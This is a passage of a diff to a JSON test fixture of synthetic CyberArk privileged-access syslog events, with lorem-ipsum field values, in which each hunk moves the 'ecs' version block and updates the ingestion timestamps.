"2021-06-09T10:19:22.410955700Z" + "ingested": "2021-12-14T14:41:55.823561935Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "udan 2017-10-19 04:03:07.172538723 +0000 UTC yCic5749.www.localhost %CYBERARK: MessageID=\"119\";itanim 1.4024\",ProductAccount=\"olorema\",ProductProcess=\"mollita\",EventId=\"tatem\",EventClass=\"iae\",EventSeverity=\"low\",EventMessage=\"allow\",ActingUserName=\"emip\",ActingAddress=\"10.199.5.49\",ActionSourceUser=\"stquid\",ActionTargetUser=\"turadipi\",ActionObject=\"usmodi\",ActionSafe=\"ree\",ActionLocation=\"saquaea\",ActionCategory=\"ation\",ActionRequestId=\"luptas\",ActionReason=\"minim\",ActionExtraDetails=\"ataevi\"", "event": { - "ingested": 
"2021-06-09T10:19:22.410960300Z" + "ingested": "2021-12-14T14:41:55.823562689Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"156\";plic 1.7053\",ProductAccount=\"utlabo\",ProductProcess=\"tetur\",EventId=\"tionula\",EventClass=\"ritqu\",EventSeverity=\"very-high\",EventMessage=\"allow\",ActingUserName=\"uamei\",ActingAddress=\"10.193.219.34\",ActionSourceUser=\"onse\",ActionTargetUser=\"olorem\",ActionObject=\"turvel\",ActionSafe=\"eratv\",ActionLocation=\"ipsa\",ActionCategory=\"asuntexp\",ActionRequestId=\"adminim\",ActionReason=\"orisni\",ActionExtraDetails=\"nse\"", "event": { - "ingested": "2021-06-09T10:19:22.410965100Z" + "ingested": "2021-12-14T14:41:55.823563454Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 16 18:08:15 nderi %CYBERARK: MessageID=\"202\";Version=1.7083;Message=allow;Issuer=animid;Station=10.120.167.217;File=atuse;Safe=ueipsa;Location=scipitl;Category=eumi;RequestId=quasiarc;Reason=olli;Severity=low;SourceUser=tetura;TargetUser=rsp;GatewayStation=10.174.185.109;TicketID=roquisqu;PolicyID=edolorin;UserName=dolorem;LogonDomain=tem6815.home;Address=taliqui5348.mail.localdomain;CPMStatus=loremag;Port=6816;Database=tsuntinc;DeviceType=inrepreh;ExtraDetails=quovo;", "event": { - "ingested": "2021-06-09T10:19:22.410970200Z" + "ingested": "2021-12-14T14:41:55.823564096Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: 
MessageID=\"133\";Version=1.1432;Message=cancel;Issuer=atev;Station=10.117.137.159;File=acommodi;Safe=essecill;Location=billoi;Category=moles;RequestId=dipiscin;Reason=olup;Severity=high;SourceUser=undeomni;TargetUser=accusa;GatewayStation=10.141.213.219;TicketID=itat;PolicyID=stlaboru;UserName=ate;LogonDomain=mporainc2064.home;Address=atnulapa3548.www.domain;CPMStatus=radipisc;Port=5347;Database=nibus;DeviceType=vitaed;ExtraDetails=ser;", "event": { - "ingested": "2021-06-09T10:19:22.410974700Z" + "ingested": "2021-12-14T14:41:55.823564817Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2017-12-15 08:13:24.212538723 +0000 UTC ill6772.www.invalid %CYBERARK: MessageID=\"104\";Version=1.4043;Message=cancel;Issuer=rem;Station=10.166.90.130;File=mdolore;Safe=eosquira;Location=pta;Category=snos;RequestId=orsi;Reason=tetura;Severity=very-high;SourceUser=lorsita;TargetUser=eavol;GatewayStation=10.94.224.229;TicketID=lupta;PolicyID=npr;UserName=etconsec;LogonDomain=caboNem1043.internal.home;Address=litesseq6785.host;CPMStatus=tob;Port=7390;Database=oditempo;DeviceType=doeiu;ExtraDetails=deF;", "event": { - "ingested": "2021-06-09T10:19:22.410979100Z" + "ingested": "2021-12-14T14:41:55.823565564Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rcitat 2017-12-29 15:15:58.472538723 +0000 UTC dolorema2984.www.home %CYBERARK: MessageID=\"316\";Version=1.2456;Message=deny;Issuer=tiumto;Station=10.38.28.151;File=nrepreh;Safe=ratv;Location=alorum;Category=mquisn;RequestId=atq;Reason=erspi;Severity=low;SourceUser=ugiatquo;TargetUser=incidid;GatewayStation=10.201.81.46;TicketID=sBonor;PolicyID=fugits;UserName=mipsumqu;LogonDomain=tatio6513.www.invalid;Address=onnu2272.mail.corp;CPMStatus=atatnon;Port=6064;Database=abor;DeviceType=magnid;ExtraDetails=adol;", "event": { - "ingested": 
"2021-06-09T10:19:22.410983700Z" + "ingested": "2021-12-14T14:41:55.823566248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 12 22:18:32 niam %CYBERARK: MessageID=\"266\";Version=1.2721;Message=deny;Issuer=rerepre;Station=10.214.245.95;File=quiineav;Safe=billoinv;Location=sci;Category=col;RequestId=obea;Reason=emp;Severity=medium;SourceUser=luptas;TargetUser=uptatem;GatewayStation=10.255.28.56;TicketID=inrepr;PolicyID=mol;UserName=umdolors;LogonDomain=dolori6232.api.invalid;Address=llit958.www.domain;CPMStatus=tat;Port=2957;Database=odt;DeviceType=cillumd;ExtraDetails=riosa;", "event": { - "ingested": "2021-06-09T10:19:22.410988200Z" + "ingested": "2021-12-14T14:41:55.823567046Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 27 05:21:06 lapar %CYBERARK: MessageID=\"311\";ritati 1.3219\",ProductAccount=\"qui\",ProductProcess=\"otamr\",EventId=\"nim\",EventClass=\"ame\",EventSeverity=\"very-high\",EventMessage=\"cancel\",ActingUserName=\"mip\",ActingAddress=\"10.45.35.180\",ActionSourceUser=\"mvolupta\",ActionTargetUser=\"Utenima\",ActionObject=\"iqua\",ActionSafe=\"luptat\",ActionLocation=\"deriti\",ActionCategory=\"sintocc\",ActionRequestId=\"cididu\",ActionReason=\"uteir\",ActionExtraDetails=\"boree\"", "event": { - "ingested": "2021-06-09T10:19:22.410992700Z" + "ingested": "2021-12-14T14:41:55.823567522Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 10 12:23:41 diduntu %CYBERARK: MessageID=\"285\";eiusmod 
1.7546\",ProductAccount=\"ess\",ProductProcess=\"uide\",EventId=\"scivel\",EventClass=\"henderi\",EventSeverity=\"low\",EventMessage=\"accept\",ActingUserName=\"enim\",ActingAddress=\"10.141.200.133\",ActionSourceUser=\"ersp\",ActionTargetUser=\"iame\",ActionObject=\"orroquis\",ActionSafe=\"aquio\",ActionLocation=\"riatu\",ActionCategory=\"loinve\",ActionRequestId=\"tanimid\",ActionReason=\"isnostru\",ActionExtraDetails=\"nofdeFi\"", "event": { - "ingested": "2021-06-09T10:19:22.410996900Z" + "ingested": "2021-12-14T14:41:55.823567967Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"155\";ulap 1.3765\",ProductAccount=\"illoi\",ProductProcess=\"reetdolo\",EventId=\"rationev\",EventClass=\"ehender\",EventSeverity=\"medium\",EventMessage=\"accept\",ActingUserName=\"ugi\",ActingAddress=\"10.83.238.145\",ActionSourceUser=\"ptatems\",ActionTargetUser=\"runtmo\",ActionObject=\"ore\",ActionSafe=\"isund\",ActionLocation=\"exerci\",ActionCategory=\"tas\",ActionRequestId=\"oraincid\",ActionReason=\"quaer\",ActionExtraDetails=\"eetdo\"", "event": { - "ingested": "2021-06-09T10:19:22.411001500Z" + "ingested": "2021-12-14T14:41:55.823570766Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018-03-11 02:28:49.772538723 +0000 UTC aali6869.api.localdomain %CYBERARK: MessageID=\"48\";Version=1.3147;Message=block;Issuer=sedquiac;Station=10.39.143.155;File=ipsaqu;Safe=nisiut;Location=rumwri;Category=velill;RequestId=ore;Reason=tation;Severity=very-high;SourceUser=porincid;TargetUser=tperspic;GatewayStation=10.41.89.217;TicketID=ict;PolicyID=squirati;UserName=tem;LogonDomain=mestq2106.api.host;Address=llamc6724.www.lan;CPMStatus=tesseci;Port=4020;Database=radipis;DeviceType=cive;ExtraDetails=nse;", "event": { - "ingested": "2021-06-09T10:19:22.411005900Z" + "ingested": 
"2021-12-14T14:41:55.823571353Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "isnisiu 2018-03-25 09:31:24.032538723 +0000 UTC suntincu2940.www5.domain %CYBERARK: MessageID=\"378\";Version=1.6382;Message=accept;Issuer=minim;Station=10.5.5.1;File=reseosq;Safe=gna;Location=isiutali;Category=lumqu;RequestId=onulamco;Reason=ons;Severity=low;SourceUser=uptat;TargetUser=unt;GatewayStation=10.153.123.20;TicketID=tla;PolicyID=mquiad;UserName=CSe;LogonDomain=lors7553.api.local;Address=reseosqu1629.mail.lan;CPMStatus=utemvel;Port=5325;Database=atu;DeviceType=iusm;ExtraDetails=roi;", "event": { - "ingested": "2021-06-09T10:19:22.411010300Z" + "ingested": "2021-12-14T14:41:55.823571835Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018-04-08 16:33:58.292538723 +0000 UTC rere5274.mail.domain %CYBERARK: MessageID=\"269\";Version=1.3193;Message=deny;Issuer=iamea;Station=10.210.61.109;File=tiumto;Safe=cor;Location=odoco;Category=oin;RequestId=itseddoe;Reason=elites;Severity=low;SourceUser=uamei;TargetUser=eursinto;GatewayStation=10.168.132.175;TicketID=licaboNe;PolicyID=tautfug;UserName=giatquov;LogonDomain=olu5333.www.domain;Address=orumSe4514.www.corp;CPMStatus=umquam;Port=80;Database=ici;DeviceType=nisiuta;ExtraDetails=iquaUt;", "event": { - "ingested": "2021-06-09T10:19:22.411014700Z" + "ingested": "2021-12-14T14:41:55.823572339Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"176\";atnula 
1.5038\",ProductAccount=\"lmo\",ProductProcess=\"iquidex\",EventId=\"olup\",EventClass=\"remipsu\",EventSeverity=\"low\",EventMessage=\"accept\",ActingUserName=\"quiac\",ActingAddress=\"10.123.154.17\",ActionSourceUser=\"etdol\",ActionTargetUser=\"dolorsi\",ActionObject=\"nturmag\",ActionSafe=\"tura\",ActionLocation=\"osquirat\",ActionCategory=\"equat\",ActionRequestId=\"aliquid\",ActionReason=\"usantiu\",ActionExtraDetails=\"idunt\"", "event": { - "ingested": "2021-06-09T10:19:22.411019300Z" + "ingested": "2021-12-14T14:41:55.823572754Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"4\";min 1.136\",ProductAccount=\"xplic\",ProductProcess=\"eseruntm\",EventId=\"lpaquiof\",EventClass=\"oloreeu\",EventSeverity=\"very-high\",EventMessage=\"deny\",ActingUserName=\"etquasia\",ActingAddress=\"10.169.123.103\",ActionSourceUser=\"riatur\",ActionTargetUser=\"oeni\",ActionObject=\"dol\",ActionSafe=\"dol\",ActionLocation=\"atur\",ActionCategory=\"issu\",ActionRequestId=\"identsu\",ActionReason=\"piscivel\",ActionExtraDetails=\"hend\"", "event": { - "ingested": "2021-06-09T10:19:22.411023800Z" + "ingested": "2021-12-14T14:41:55.823573255Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"276\";aer 1.7744\",ProductAccount=\"iati\",ProductProcess=\"minim\",EventId=\"scipi\",EventClass=\"tur\",EventSeverity=\"very-high\",EventMessage=\"cancel\",ActingUserName=\"Nemoenim\",ActingAddress=\"10.126.205.76\",ActionSourceUser=\"etur\",ActionTargetUser=\"rsitvol\",ActionObject=\"utali\",ActionSafe=\"sed\",ActionLocation=\"xeac\",ActionCategory=\"umdolors\",ActionRequestId=\"lumdo\",ActionReason=\"acom\",ActionExtraDetails=\"eFini\"", "event": { - "ingested": "2021-06-09T10:19:22.411028200Z" + "ingested": "2021-12-14T14:41:55.823573637Z" + }, + "ecs": { + "version": 
"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 4 20:44:15 uovol %CYBERARK: MessageID=\"38\";Version=1.3184;Message=accept;Issuer=eufug;Station=10.164.66.154;File=est;Safe=civelits;Location=ici;Category=snulap;RequestId=enimadm;Reason=stenatu;Severity=very-high;SourceUser=sitvo;TargetUser=ine;GatewayStation=10.169.101.161;TicketID=itessequ;PolicyID=iusmodit;UserName=orissu;LogonDomain=fic5107.home;Address=mmodoco2581.www5.host;CPMStatus=isiutali;Port=3575;Database=stquidol;DeviceType=Nemoenim;ExtraDetails=imadmini;", "event": { - "ingested": "2021-06-09T10:19:22.411033Z" + "ingested": "2021-12-14T14:41:55.823574057Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amvo 2018-06-19 03:46:49.592538723 +0000 UTC tnul6235.www5.lan %CYBERARK: MessageID=\"79\";isau 1.1480\",ProductAccount=\"ihilmole\",ProductProcess=\"saquaea\",EventId=\"ons\",EventClass=\"orsitam\",EventSeverity=\"medium\",EventMessage=\"block\",ActingUserName=\"metco\",ActingAddress=\"10.70.83.200\",ActionSourceUser=\"riame\",ActionTargetUser=\"riat\",ActionObject=\"sseq\",ActionSafe=\"eriam\",ActionLocation=\"pernat\",ActionCategory=\"udan\",ActionRequestId=\"archi\",ActionReason=\"iutaliq\",ActionExtraDetails=\"urQuis\"", "event": { - "ingested": "2021-06-09T10:19:22.411037500Z" + "ingested": "2021-12-14T14:41:55.823574434Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 3 10:49:23 orum %CYBERARK: 
MessageID=\"53\";Version=1.4887;Message=block;Issuer=madminim;Station=10.207.97.192;File=quio;Safe=eom;Location=teni;Category=ipiscive;RequestId=dant;Reason=etdolor;Severity=high;SourceUser=paria;TargetUser=mmod;GatewayStation=10.134.55.11;TicketID=amqu;PolicyID=lorsitam;UserName=tanimid;LogonDomain=onpr47.api.home;Address=oremqu7663.local;CPMStatus=llumq;Port=5816;Database=tetura;DeviceType=rumet;ExtraDetails=uptasnul;", "event": { - "ingested": "2021-06-09T10:19:22.411041900Z" + "ingested": "2021-12-14T14:41:55.823574871Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018-07-17 17:51:58.112538723 +0000 UTC nde2358.mail.corp %CYBERARK: MessageID=\"75\";Version=1.3601;Message=cancel;Issuer=texplica;Station=10.52.150.104;File=esse;Safe=veniam;Location=edquian;Category=sus;RequestId=imavenia;Reason=expli;Severity=low;SourceUser=orum;TargetUser=oinBCSed;GatewayStation=10.31.187.19;TicketID=ilm;PolicyID=mvel;UserName=eritq;LogonDomain=rehen4859.api.host;Address=eve234.www5.local;CPMStatus=nula;Port=2783;Database=lit;DeviceType=santi;ExtraDetails=ritati;", "event": { - "ingested": "2021-06-09T10:19:22.411046300Z" + "ingested": "2021-12-14T14:41:55.823575488Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dip 2018-08-01 00:54:32.372538723 +0000 UTC idolo5292.local %CYBERARK: MessageID=\"89\";Version=1.3175;Message=allow;Issuer=runtm;Station=10.41.232.147;File=psumd;Safe=oloree;Location=seos;Category=rios;RequestId=labo;Reason=lpaquiof;Severity=high;SourceUser=mcorpo;TargetUser=ntexpl;GatewayStation=10.61.175.217;TicketID=enbyCi;PolicyID=reetdo;UserName=tat;LogonDomain=eufugia4481.corp;Address=fficia2304.www5.home;CPMStatus=vel;Port=2396;Database=rere;DeviceType=pta;ExtraDetails=nonn;", "event": { - "ingested": "2021-06-09T10:19:22.411050800Z" + "ingested": "2021-12-14T14:41:55.823575922Z" + }, + 
"ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 15 07:57:06 volup %CYBERARK: MessageID=\"261\";ptate 1.3830\",ProductAccount=\"uisnos\",ProductProcess=\"quamqua\",EventId=\"ntut\",EventClass=\"mag\",EventSeverity=\"very-high\",EventMessage=\"deny\",ActingUserName=\"mini\",ActingAddress=\"10.150.30.95\",ActionSourceUser=\"tur\",ActionTargetUser=\"atnonpr\",ActionObject=\"ita\",ActionSafe=\"amquaer\",ActionLocation=\"aqui\",ActionCategory=\"enby\",ActionRequestId=\"lpa\",ActionReason=\"isn\",ActionExtraDetails=\"smod\"", "event": { - "ingested": "2021-06-09T10:19:22.411055300Z" + "ingested": "2021-12-14T14:41:55.823576310Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 29 14:59:40 siuta %CYBERARK: MessageID=\"66\";atev 1.6626\",ProductAccount=\"CSe\",ProductProcess=\"exerci\",EventId=\"inesciu\",EventClass=\"quid\",EventSeverity=\"high\",EventMessage=\"deny\",ActingUserName=\"onse\",ActingAddress=\"10.98.71.45\",ActionSourceUser=\"destla\",ActionTargetUser=\"fugitse\",ActionObject=\"minimve\",ActionSafe=\"serrorsi\",ActionLocation=\"tametco\",ActionCategory=\"mquisnos\",ActionRequestId=\"lore\",ActionReason=\"isci\",ActionExtraDetails=\"Dui\"", "event": { - "ingested": "2021-06-09T10:19:22.411059800Z" + "ingested": "2021-12-14T14:41:55.823576696Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lup 2018-09-12 22:02:15.152538723 +0000 UTC iumtotam1010.www5.corp %CYBERARK: MessageID=\"168\";userror 
1.5986\",ProductAccount=\"nonn\",ProductProcess=\"hite\",EventId=\"ianonnum\",EventClass=\"nofdeFi\",EventSeverity=\"medium\",EventMessage=\"deny\",ActingUserName=\"remq\",ActingAddress=\"10.252.251.143\",ActionSourceUser=\"velill\",ActionTargetUser=\"rspic\",ActionObject=\"orinrepr\",ActionSafe=\"ror\",ActionLocation=\"onsecte\",ActionCategory=\"doei\",ActionRequestId=\"nvolupta\",ActionReason=\"tev\",ActionExtraDetails=\"nre\"", "event": { - "ingested": "2021-06-09T10:19:22.411082Z" + "ingested": "2021-12-14T14:41:55.823577088Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"274\";lumdolor 1.4706\",ProductAccount=\"eserun\",ProductProcess=\"rvelill\",EventId=\"lupta\",EventClass=\"byC\",EventSeverity=\"high\",EventMessage=\"accept\",ActingUserName=\"uta\",ActingAddress=\"10.197.203.167\",ActionSourceUser=\"ulapa\",ActionTargetUser=\"iumdo\",ActionObject=\"iusmodit\",ActionSafe=\"aturv\",ActionLocation=\"ectetura\",ActionCategory=\"obeataev\",ActionRequestId=\"umf\",ActionReason=\"olesti\",ActionExtraDetails=\"smo\"", "event": { - "ingested": "2021-06-09T10:19:22.411089300Z" + "ingested": "2021-12-14T14:41:55.823577570Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tDuis 2018-10-11 12:07:23.672538723 +0000 UTC iqu1643.www.host %CYBERARK: MessageID=\"96\";inim 1.6806\",ProductAccount=\"ibusBo\",ProductProcess=\"untincu\",EventId=\"tten\",EventClass=\"etur\",EventSeverity=\"low\",EventMessage=\"accept\",ActingUserName=\"enima\",ActingAddress=\"10.187.170.23\",ActionSourceUser=\"sequ\",ActionTargetUser=\"sectetu\",ActionObject=\"evi\",ActionSafe=\"tionula\",ActionLocation=\"accus\",ActionCategory=\"uatu\",ActionRequestId=\"mquis\",ActionReason=\"lab\",ActionExtraDetails=\"uido\"", "event": { - "ingested": "2021-06-09T10:19:22.411095200Z" + "ingested": 
"2021-12-14T14:41:55.823577996Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018-10-25 19:09:57.932538723 +0000 UTC nimadmin5577.corp %CYBERARK: MessageID=\"61\";Version=1.3824;Message=allow;Issuer=tinculpa;Station=10.123.62.215;File=rumSecti;Safe=riamea;Location=eca;Category=oluptate;RequestId=Duisa;Reason=consequa;Severity=low;SourceUser=iaecon;TargetUser=aevitaed;GatewayStation=10.250.248.215;TicketID=remap;PolicyID=deri;UserName=quaeratv;LogonDomain=involu1450.www.localhost;Address=udexerc2708.api.test;CPMStatus=odic;Port=505;Database=lica;DeviceType=secil;ExtraDetails=uisnos;", "event": { - "ingested": "2021-06-09T10:19:22.411100100Z" + "ingested": "2021-12-14T14:41:55.823578390Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "scipit 2018-11-09 02:12:32.192538723 +0000 UTC lloinve551.internal.local %CYBERARK: MessageID=\"372\";Version=1.3759;Message=block;Issuer=isiutali;Station=10.146.57.23;File=evit;Safe=tno;Location=iss;Category=taspe;RequestId=lum;Reason=xerc;Severity=high;GatewayStation=10.147.154.118;TicketID=nvol;PolicyID=enimadmi;UserName=tateveli;LogonDomain=osa3211.www5.example;Address=temvele5776.www.test;CPMStatus=inimve;Port=\"864\";Database=cin;DeviceType=tmo;ExtraDetails=onofdeF;", "event": { - "ingested": "2021-06-09T10:19:22.411104600Z" + "ingested": "2021-12-14T14:41:55.823578776Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "its 2018-11-23 09:15:06.452538723 +0000 UTC uptasnul2751.www5.corp %CYBERARK: MessageID=\"232\";ostrudex 
1.4542\",ProductAccount=\"niamqui\",ProductProcess=\"usmodite\",EventId=\"tlabo\",EventClass=\"tatemse\",EventSeverity=\"very-high\",EventMessage=\"cancel\",ActingUserName=\"uamestqu\",ActingAddress=\"10.193.33.201\",ActionSourceUser=\"hender\",ActionTargetUser=\"ptatemU\",ActionObject=\"seq\",ActionSafe=\"rumSe\",ActionLocation=\"tatnonp\",ActionCategory=\"ommo\",ActionRequestId=\"adeser\",ActionReason=\"uasiarc\",ActionExtraDetails=\"doeiu\"", "event": { - "ingested": "2021-06-09T10:19:22.411109500Z" + "ingested": "2021-12-14T14:41:55.823579212Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018-12-07 16:17:40.712538723 +0000 UTC atuserro6791.internal.host %CYBERARK: MessageID=\"24\";upta 1.313\",ProductAccount=\"onnumqua\",ProductProcess=\"quioff\",EventId=\"iuntN\",EventClass=\"ipis\",EventSeverity=\"low\",EventMessage=\"block\",ActingUserName=\"nesci\",ActingAddress=\"10.154.172.82\",ActionSourceUser=\"lorsi\",ActionTargetUser=\"tetura\",ActionObject=\"eeufug\",ActionSafe=\"edutper\",ActionLocation=\"tevelite\",ActionCategory=\"tocca\",ActionRequestId=\"orsitvol\",ActionReason=\"ntor\",ActionExtraDetails=\"oinBCSed\"", "event": { - "ingested": "2021-06-09T10:19:22.411114Z" + "ingested": "2021-12-14T14:41:55.823579653Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"79\";obeatae 1.1886\",ProductAccount=\"midestl\",ProductProcess=\"quatu\",EventId=\"avolu\",EventClass=\"teturad\",EventSeverity=\"very-high\",EventMessage=\"allow\",ActingUserName=\"expl\",ActingAddress=\"10.47.63.70\",ActionSourceUser=\"lup\",ActionTargetUser=\"tpers\",ActionObject=\"orsitv\",ActionSafe=\"temseq\",ActionLocation=\"uisaute\",ActionCategory=\"uun\",ActionRequestId=\"end\",ActionReason=\"odocons\",ActionExtraDetails=\"olu\"", "event": { - "ingested": "2021-06-09T10:19:22.411119600Z" + 
"ingested": "2021-12-14T14:41:55.823580301Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 5 06:22:49 amn %CYBERARK: MessageID=\"312\";itessequ 1.5170\",ProductAccount=\"fdeFinib\",ProductProcess=\"uip\",EventId=\"ectobea\",EventClass=\"dat\",EventSeverity=\"very-high\",EventMessage=\"block\",ActingUserName=\"turQuis\",ActingAddress=\"10.178.160.245\",ActionSourceUser=\"deomnisi\",ActionTargetUser=\"olupta\",ActionObject=\"oll\",ActionSafe=\"laboree\",ActionLocation=\"udantiu\",ActionCategory=\"itametco\",ActionRequestId=\"iav\",ActionReason=\"odico\",ActionExtraDetails=\"rsint\"", "event": { - "ingested": "2021-06-09T10:19:22.411124300Z" + "ingested": "2021-12-14T14:41:55.823580940Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 19 13:25:23 quiav %CYBERARK: MessageID=\"77\";Version=1.6648;Message=block;Issuer=Nem;Station=10.85.13.237;File=oluptat;Safe=enimad;Location=tis;Category=qua;RequestId=con;Reason=tore;Severity=high;SourceUser=quelaud;TargetUser=luptat;GatewayStation=10.89.154.115;TicketID=oeiusmo;PolicyID=nimv;UserName=emeu;LogonDomain=tatemac5192.www5.test;Address=teursint1321.www5.example;CPMStatus=lamcolab;Port=7024;Database=nturmag;DeviceType=uredol;ExtraDetails=maliqua;", "event": { - "ingested": "2021-06-09T10:19:22.411128600Z" + "ingested": "2021-12-14T14:41:55.823581597Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-02-02 20:27:57.752538723 +0000 UTC omnisi5530.mail.example %CYBERARK: 
MessageID=\"308\";Version=1.3387;Message=allow;Issuer=itame;Station=10.222.32.183;File=yCiceroi;Safe=nostrum;Location=orroquis;Category=eumi;RequestId=tvo;Reason=aea;Severity=low;SourceUser=mmo;TargetUser=eve;GatewayStation=10.65.207.234;TicketID=ciad;PolicyID=ugiatqu;UserName=eruntmo;LogonDomain=nimve2787.mail.test;Address=boreet2051.internal.localdomain;CPMStatus=iavo;Port=1644;Database=udexerc;DeviceType=ovolupta;ExtraDetails=volup;", "event": { - "ingested": "2021-06-09T10:19:22.411133100Z" + "ingested": "2021-12-14T14:41:55.823582003Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rro 2019-02-17 03:30:32.012538723 +0000 UTC tuser6944.local %CYBERARK: MessageID=\"54\";iarchite 1.1612\",ProductAccount=\"oinven\",ProductProcess=\"natu\",EventId=\"edqu\",EventClass=\"tationu\",EventSeverity=\"high\",EventMessage=\"cancel\",ActingUserName=\"olore\",ActingAddress=\"10.16.181.60\",ActionSourceUser=\"ameaquei\",ActionTargetUser=\"gnama\",ActionObject=\"esciun\",ActionSafe=\"tesse\",ActionLocation=\"olupta\",ActionCategory=\"isno\",ActionRequestId=\"oluptas\",ActionReason=\"nderiti\",ActionExtraDetails=\"uatu\"", "event": { - "ingested": "2021-06-09T10:19:22.411137300Z" + "ingested": "2021-12-14T14:41:55.823582400Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orem 2019-03-03 10:33:06.272538723 +0000 UTC giatqu1484.internal.corp %CYBERARK: MessageID=\"208\";oreseosq 1.2275\",ProductAccount=\"uianon\",ProductProcess=\"nul\",EventId=\"onse\",EventClass=\"sitam\",EventSeverity=\"very-high\",EventMessage=\"deny\",ActingUserName=\"illoin\",ActingAddress=\"10.91.213.82\",ActionSourceUser=\"uid\",ActionTargetUser=\"amnis\",ActionObject=\"rvelil\",ActionSafe=\"adese\",ActionLocation=\"olorsi\",ActionCategory=\"caboNemo\",ActionRequestId=\"uptas\",ActionReason=\"temaccus\",ActionExtraDetails=\"ons\"", 
